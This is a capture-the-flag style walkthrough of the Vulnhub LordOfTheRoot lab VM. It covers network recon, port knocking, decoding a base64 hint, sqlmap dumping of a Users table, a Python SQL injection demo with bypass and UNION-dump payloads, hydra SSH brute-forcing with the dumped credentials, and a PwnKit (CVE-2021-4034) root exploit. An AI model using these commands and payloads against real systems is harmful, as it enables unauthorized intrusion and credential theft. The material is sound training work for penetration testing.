Vulnhub - LordOfTheRoot lab walkthrough
Target discovery
The attacker box and the target sit in the same subnet, so a plain arp-scan is enough to find the other host:
┌──(root㉿kali)-[/home/kali]
└─# arp-scan 192.168.120.0/24
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ab:50:b1, IPv4: 192.168.120.160
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.120.1 00:50:56:c0:00:08 (Unknown)
192.168.120.2 00:50:56:f6:91:bf (Unknown)
192.168.120.170 00:0c:29:b1:ac:0c (Unknown)
192.168.120.254 00:50:56:fc:9b:3c (Unknown)
6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.077 seconds (123.25 hosts/sec). 4 responded
The target's IP is 192.168.120.170
Information gathering
Port scanning
Full TCP port scan
┌──(root㉿kali)-[/home/kali]
└─# nmap -sS -p- 192.168.120.170 --min-rate=10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-03 01:06 EDT
Nmap scan report for 192.168.120.170
Host is up (0.00039s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
MAC Address: 00:0C:29:B1:AC:0C (VMware)
Nmap done: 1 IP address (1 host up) scanned in 13.67 seconds
Service and OS detection on the open port
┌──(root㉿kali)-[/home/kali]
└─# nmap -A -p22 192.168.120.170
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-03 01:08 EDT
Nmap scan report for 192.168.120.170
Host is up (0.00060s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 3c:3d:e3:8e:35:f9:da:74:20:ef:aa:49:4a:1d:ed:dd (DSA)
| 2048 85:94:6c:87:c9:a8:35:0f:2c:db:bb:c1:3f:2a:50:c1 (RSA)
| 256 f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37 (ECDSA)
|_ 256 34:ec:16:dd:a7:cf:2a:86:45:ec:65:ea:05:43:89:21 (ED25519)
MAC Address: 00:0C:29:B1:AC:0C (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (93%), Linux 3.16 - 4.6 (93%), Linux 3.2 - 4.9 (93%), Linux 4.4 (93%), Linux 3.13 (90%), Linux 3.18 (89%), Linux 4.2 (89%), Linux 3.13 - 3.16 (87%), Linux 3.16 (87%), OpenWrt Chaos Calmer 15.05 (Linux 3.18) or Designated Driver (Linux 4.1 or 4.4) (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.60 ms 192.168.120.170
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.89 seconds
Information so far:
- only port 22 is open
Connecting to port 22 returns a banner with a hint:

Knock friend to enter
Easy as 1,2,3
The guess: port knocking. Probe a set of ports in a specific order and the firewall will open something else.
Port knocking
PS: port knocking
A way of opening ports that are closed from the outside by making connection attempts. Once the firewall sees the attempts in the correct order it dynamically opens ports for the host that sent them.
Steps:
nmap -Pn -r target -p 1,2,3            # -r: probe ports 1,2,3 in order (this is the knock)
nmap -sS -p- target --min-rate=1000    # rescan: does a new port show up?
nmap -A -p<port> target                # fingerprint the port(s) the previous command found
Alternatively, send the knock with the knock client that ships with the knockd package:
knock 192.168.120.170 1 2 3
For reference, the options below belong to the knockd daemon (the server side that listens for the sequence), not to the knock client:
-i, --interface         interface to listen on; default eth0
-d, --daemon            become a daemon; the normal server-style mode of operation
-c, --config <file>     alternate location of the configuration file; default /etc/knockd.conf
-D, --debug             output debugging messages
-l, --lookup            look up DNS names for log entries; this can be a security risk, see the "Security notes" section of the man page
-v, --verbose           output verbose status messages
-V, --version           display the version
-h, --help              syntax help
┌──(root㉿kali)-[/home/kali]
└─# nmap -Pn -r 192.168.120.170 -p 1,2,3
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-03 01:31 EDT
Nmap scan report for 192.168.120.170
Host is up (0.00044s latency).
PORT STATE SERVICE VERSION
1/tcp filtered tcpmux
2/tcp filtered compressnet
3/tcp filtered compressnet
MAC Address: 00:0C:29:B1:AC:0C (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.87 seconds
┌──(root㉿kali)-[/home/kali]
└─# nmap -sS -p- 192.168.120.170 --min-rate=10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-03 01:31 EDT
Nmap scan report for 192.168.120.170
Host is up (0.00036s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
1337/tcp open waste
MAC Address: 00:0C:29:B1:AC:0C (VMware)
Nmap done: 1 IP address (1 host up) scanned in 13.50 seconds
┌──(root㉿kali)-[/home/kali]
└─# nmap -A -p22,1337 192.168.120.170
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-03 01:32 EDT
Nmap scan report for 192.168.120.170
Host is up (0.00059s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 3c:3d:e3:8e:35:f9:da:74:20:ef:aa:49:4a:1d:ed:dd (DSA)
| 2048 85:94:6c:87:c9:a8:35:0f:2c:db:bb:c1:3f:2a:50:c1 (RSA)
| 256 f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37 (ECDSA)
|_ 256 34:ec:16:dd:a7:cf:2a:86:45:ec:65:ea:05:43:89:21 (ED25519)
1337/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.7 (Ubuntu)
MAC Address: 00:0C:29:B1:AC:0C (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (93%), Linux 3.16 - 4.6 (93%), Linux 3.2 - 4.9 (93%), Linux 4.4 (93%), Linux 3.13 (90%), Linux 3.18 (89%), Linux 4.2 (89%), Linux 3.13 - 3.16 (87%), Linux 3.16 (87%), OpenWrt Chaos Calmer 15.05 (Linux 3.18) or Designated Driver (Linux 4.1 or 4.4) (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.58 ms 192.168.120.170
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.15 seconds
This time an extra port shows up: 1337. The "waste" label in the first table is only nmap's default name for port 1337 taken from its nmap-services file; version detection (-A) shows that it is actually Apache httpd 2.4.7 serving a website.
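The knock-then-rescan routine above, as an added Python example (not code from the original write-up). The host, the knock sequence 1,2,3 and the ports rechecked afterwards (22 and 1337) are the values from this box; the function names are mine. It uses plain TCP connects, so unlike nmap -sS it needs no root, and it compares the state of the interesting ports before and after the knock.

```python
"""Port knocking with the standard library: send the sequence, then recheck ports.

Added example, not code from the original write-up. Host, knock sequence and the
ports checked afterwards are the values from this box; the function names are mine.
A plain TCP connect is enough: the firewall sees the SYN whether or not the port
answers, and unlike nmap -sS it needs no root.
"""
import socket
import time


def knock(host, sequence, delay=0.2, timeout=0.5):
    """Attempt one TCP connect per port, strictly in order. Returns the ports tried."""
    tried = []
    for port in sequence:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(timeout)
        try:
            sock.connect((host, port))   # refused or timed out is fine: the SYN went out
        except OSError:
            pass
        finally:
            sock.close()
        tried.append(port)
        time.sleep(delay)                # knockd wants the knocks in sequence, not in parallel
    return tried


def is_open(host, port, timeout=1.0):
    """True when a TCP connection to host:port completes."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def knock_and_check(host, sequence, check_ports):
    """Knock, then map each port in check_ports to (open_before, open_after)."""
    before = {p: is_open(host, p) for p in check_ports}
    knock(host, sequence)
    after = {p: is_open(host, p) for p in check_ports}
    return {p: (before[p], after[p]) for p in check_ports}


if __name__ == "__main__":
    # Against the lab box: expect 22 open both times and 1337 to go False -> True
    print(knock_and_check("192.168.120.170", [1, 2, 3], [22, 1337]))
```

knockd normally opens the port only for the source address that knocked, so the knock and the follow-up scan have to come from the same machine. `nmap -Pn -r` works as a knocker because -r turns off port randomisation, but nmap retransmits probes to ports that do not answer, which can disturb a strict sequence; a dedicated knocker like the one above is more predictable, and if the opened port closes again after a while, simply knock again.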
Directory scan of the website
Scan the target site for directories and files with gobuster:
┌──(root㉿kali)-[/home/kali]
└─# gobuster dir -u http://192.168.120.170:1337/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,js,asp,aspx,jsp,bak,swp,config,env,json,log,git -t 100 -b 404,400
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.120.170:1337/
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404,400
[+] User Agent: gobuster/3.6
[+] Extensions: js,config,log,git,html,asp,aspx,jsp,bak,swp,env,json,php,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 288]
/.html (Status: 403) [Size: 289]
/index.html (Status: 200) [Size: 64]
/images (Status: 301) [Size: 325] [--> http://192.168.120.170:1337/images/]
/404.html (Status: 200) [Size: 116]
/.php (Status: 403) [Size: 288]
/.html (Status: 403) [Size: 289]
/server-status (Status: 403) [Size: 297]
Progress: 3308400 / 3308415 (100.00%)
===============================================================
Finished
===============================================================
Three useful paths:
- /images/
- /404.html
- /index.html
Visiting the pages
Fetching the pages with curl turns up four image files under /images/, but three of them are HTML in disguise; strings pulls the text out of them:
┌──(root㉿kali)-[/home/kali/Downloads]
└─# file back.gif blank.gif image2.gif iwilldoit.jpg
back.gif: HTML document, ASCII text
blank.gif: HTML document, ASCII text
image2.gif: HTML document, ASCII text
iwilldoit.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 336x512, components 3
┌──(root㉿kali)-[/home/kali/Downloads]
└─# strings back.gif blank.gif image2.gif iwilldoit.jpg
<html>
<img src="/images/hipster.jpg" align="middle">
<!--THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh>
</html>
<html>
<img src="/images/hipster.jpg" align="middle">
<!--THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh>
</html>
<html>
<img src="/images/hipster.jpg" align="middle">
<!--THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh>
</html>
JFIF
$.' ",#
(7),01444
'9=82<.342
!22222222222222222222222222222222222222222222222222
$3br
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
#3R
&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
KN:}
&$'y
B`~Bs
?:K-
.......
The comment in each disguised file carries the same string, and /404.html contains it as well:
┌──(root㉿kali)-[/home/kali/Downloads]
└─# curl http://192.168.120.170:1337/404.html
<html>
<img src="/images/hipster.jpg" align="middle">
<!--THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh>
</html>
The string is base64:

┌──(root㉿kali)-[/home/kali/Downloads]
└─# echo 'THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh' | base64 -d
Lzk3ODM0NTIxMC9pbmRleC5waHA= Closer!
┌──(root㉿kali)-[/home/kali/Downloads]
└─# echo 'Lzk3ODM0NTIxMC9pbmRleC5waHA=' | base64 -d
/978345210/index.php
Two layers of encoding; decoding yields a path. Run another directory scan against it.
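The comment-extraction and double decoding above, automated as an added Python example (not code from the original write-up). The sample HTML is constructed from the comment the write-up found in 404.html and the fake .gif files; the helper names are mine. The decoder keeps peeling layers while the result is still printable text, and feeds only the first word of a layer to the next round, which is what the "... Closer!" suffix requires.

```python
"""Pull HTML comments out of a page and peel nested base64 layers.

Added example, not part of the original write-up. SAMPLE_HTML is constructed
from the comment shown in the write-up; the helper names are mine.
"""
import base64
import binascii
import re

# Tolerates both a proper "-->" and the bare ">" the lab's files end the comment with.
COMMENT_RE = re.compile(r"<!--\s*(.*?)\s*-*>", re.S)
B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")


def extract_comments(html):
    """Return the text of every <!-- ... --> comment, stripped."""
    return [c.strip() for c in COMMENT_RE.findall(html)]


def looks_like_base64(token):
    """Cheap filter: base64 alphabet only and a length that is a multiple of 4."""
    return len(token) % 4 == 0 and B64_RE.fullmatch(token) is not None


def peel_base64(token, max_depth=8):
    """Decode repeatedly while the result is printable ASCII.

    Returns every layer, outermost first. A decoded layer may carry extra
    words ("... Closer!"); only its first whitespace-separated token is fed
    to the next round.
    """
    layers = [token]
    current = token
    for _ in range(max_depth):
        if not looks_like_base64(current):
            break
        try:
            decoded = base64.b64decode(current, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            break
        if not decoded.isprintable():
            break            # binary junk: one layer too far
        layers.append(decoded)
        parts = decoded.split()
        if not parts:
            break
        current = parts[0]
    return layers


def find_hidden_paths(html):
    """Innermost decoded value of every base64-looking comment, deduplicated."""
    found = []
    for comment in extract_comments(html):
        layers = peel_base64(comment)
        if len(layers) > 1 and layers[-1] not in found:
            found.append(layers[-1])
    return found


# Constructed from the comment the write-up found in 404.html and the fake .gif files
SAMPLE_HTML = """<html>
<img src="/images/hipster.jpg" align="middle">
<!--THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh>
</html>"""

if __name__ == "__main__":
    for layer in peel_base64(extract_comments(SAMPLE_HTML)[0]):
        print(layer)
    print(find_hidden_paths(SAMPLE_HTML))
```

The printable-text check is what stops the loop at the right depth: "/978345210/index.php" happens to have a length that is a multiple of 4, but the "." and "/" fall outside the base64 alphabet, and a token that is valid base64 by accident decodes to non-ASCII bytes and is rejected.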
Second directory scan
┌──(root㉿kali)-[/home/kali/Downloads]
└─# gobuster dir -u http://192.168.120.170:1337/978345210/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,js,asp,aspx,jsp,bak,swp,config,env,json,log,git -t 100 -b 404,400
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.120.170:1337/978345210/
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 400,404
[+] User Agent: gobuster/3.6
[+] Extensions: log,git,html,js,asp,jsp,bak,config,env,json,php,txt,aspx,swp
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/login.php (Status: 200) [Size: 0]
/index.php (Status: 200) [Size: 485]
/profile.php (Status: 302) [Size: 262] [--> index.php]
/.html (Status: 403) [Size: 299]
/.php (Status: 403) [Size: 298]
/logout.php (Status: 302) [Size: 0] [--> index.php]
/.html (Status: 403) [Size: 299]
/.php (Status: 403) [Size: 298]
Progress: 3308400 / 3308415 (100.00%)
===============================================================
Finished
===============================================================
Four valid pages:
- /index.php (the login form)
- /login.php (200 with an empty body, apparently the form handler)
- /profile.php (302 → index.php, apparently until you are logged in)
- /logout.php (302 → index.php)
Visiting them, only the login page actually shows anything:

With nothing else exposed, the login form is the place to try SQL injection.
SQL injection
Inject with sqlmap
sqlmap -o -u "http://192.168.120.170:1337/978345210/index.php" --forms
-o: turn on all optimization switches
-u: target URL
--forms: parse the forms on the page and test their fields
Enumerate all databases
sqlmap -o -u "http://192.168.120.170:1337/978345210/index.php" --forms --dbs

List all tables in Webapp
sqlmap -o -u "http://192.168.120.170:1337/978345210/index.php" --forms -D Webapp --tables
List all columns of the Users table (database and table names can be case-sensitive, as they are for MySQL on Linux, so use them exactly as sqlmap reported them: Webapp, Users)
sqlmap -o -u "http://192.168.120.170:1337/978345210/index.php" --forms -D Webapp -T Users --columns
Dump the values of those columns
sqlmap -o -u "http://192.168.120.170:1337/978345210/index.php" --forms -D Webapp -T Users -C username,password --dump
After trying them all, every user lands on the same page after login:
Nothing useful in it.
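Why the login form fell to sqlmap, as an added Python example (not the target's actual PHP, which the write-up never shows). It models the schema sqlmap enumerated (database Webapp, table Users, columns username and password) in an in-memory SQLite database standing in for the target's engine; the first row holds the credentials the write-up recovered, the second is a constructed filler row. The vulnerable login builds its statement by string concatenation, the safe one binds parameters, and the two payloads show a login bypass and the table dump that sqlmap --dump automates.

```python
"""String-built SQL versus a parameterized query, on the schema sqlmap found.

Added example, not the target's PHP. SQLite stands in for the real database;
the "frodo" row is constructed, the "smeagol" row uses the write-up's credentials.
"""
import sqlite3


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO Users (username, password) VALUES (?, ?)",
        [("smeagol", "MyPreciousR00t"),   # from the write-up
         ("frodo", "constructed-pw")],     # constructed filler row
    )
    conn.commit()
    return conn


def vulnerable_query(username, password):
    """Builds the statement by concatenation: user input becomes SQL syntax."""
    return ("SELECT username, password FROM Users WHERE username = '" + username
            + "' AND password = '" + password + "'")


def login_vulnerable(conn, username, password):
    """Returns the matched username, or None. Exploitable."""
    row = conn.execute(vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def dump_vulnerable(conn, username, password):
    """Every row the injected statement yields: this is what sqlmap --dump automates."""
    return conn.execute(vulnerable_query(username, password)).fetchall()


def login_safe(conn, username, password):
    """Same check with bound parameters: input can never change the query's shape."""
    row = conn.execute(
        "SELECT username FROM Users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# Payloads: the first short-circuits the WHERE clause, the second reads the whole
# table out through the login query. "-- " starts a SQL comment that discards the rest.
BYPASS = "' OR 1=1 -- "
DUMP = "' UNION ALL SELECT username, password FROM Users -- "

if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, BYPASS, "x"))   # logs in as the first user, no password known
    print(dump_vulnerable(db, DUMP, "x"))      # every username/password pair in Users
    print(login_safe(db, BYPASS, "x"))         # None: the payload is just a literal string
```

The same payloads fed to login_safe return nothing, because the driver sends the statement and the values separately and the quote characters never reach the parser as syntax.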
Gaining access
The dumped credentials may be reused elsewhere: feed the usernames and passwords to hydra against SSH to see whether any pair logs in:
┌──(root㉿kali)-[/home/kali/Templates]
└─# hydra -L user.txt -P pass.txt 192.168.120.170 ssh -t 4
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-04-03 07:59:05
[DATA] max 4 tasks per 1 server, overall 4 tasks, 25 login tries (l:5/p:5), ~7 tries per task
[DATA] attacking ssh://192.168.120.170:22/
[22][ssh] host: 192.168.120.170 login: smeagol password: MyPreciousR00t
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-04-03 07:59:20
One valid account: smeagol with password MyPreciousR00t
Try logging in:

Login successful.
Privilege escalation
smeagol is an unprivileged user, so escalation is needed. Upload a privilege-escalation exploit-suggester script; its automatic check lists three high-probability exploits:

After trying them, the third one succeeds. It is CVE-2021-4034 (PwnKit), a bug in polkit's setuid pkexec binary rather than in the kernel:
smeagol@LordOfTheRoot:/tmp/CVE-2021-4034-main$ ls
cve-2021-4034.c cve-2021-4034.sh dry-run LICENSE Makefile pwnkit.c README.md
smeagol@LordOfTheRoot:/tmp/CVE-2021-4034-main$ ./cve-2021-4034.sh
wget: unrecognized option '--no-hsts'
Usage: wget [OPTION]... [URL]...
Try `wget --help' for more options.
wget: unrecognized option '--no-hsts'
Usage: wget [OPTION]... [URL]...
Try `wget --help' for more options.
wget: unrecognized option '--no-hsts'
Usage: wget [OPTION]... [URL]...
Try `wget --help' for more options.
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true GCONV_PATH=./pwnkit.so:.
# /bin/bash
root@LordOfTheRoot:/tmp/CVE-2021-4034-main# id
uid=0(root) gid=0(root) groups=0(root),1000(smeagol)
The three wget errors are harmless here: this Ubuntu's wget predates the --no-hsts option, so the script's download step fails, but the sources are already in the directory, so the build (the cc lines) and the exploit still run. Grab the flag:
root@LordOfTheRoot:/root# ls
Flag.txt buf buf.c other other.c switcher.py
root@LordOfTheRoot:/root# cat Flag.txt
“There is only one Lord of the Ring, only one who can bend it to his will. And he does not share power.”
– Gandalf
Summary
The user information you obtain is useful: don't throw it away because it gave nothing useful in one place, use it as a brute-force dictionary wherever a login is required. If sqlmap doesn't work, try a few more times and combine it with manual testing. On this box I ran sqlmap several times; the first few attempts failed and it succeeded later.
